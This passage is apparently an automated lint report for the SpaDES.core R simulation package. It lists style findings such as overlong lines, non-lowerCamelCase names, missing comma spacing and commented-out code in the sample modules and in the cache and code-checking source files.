NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            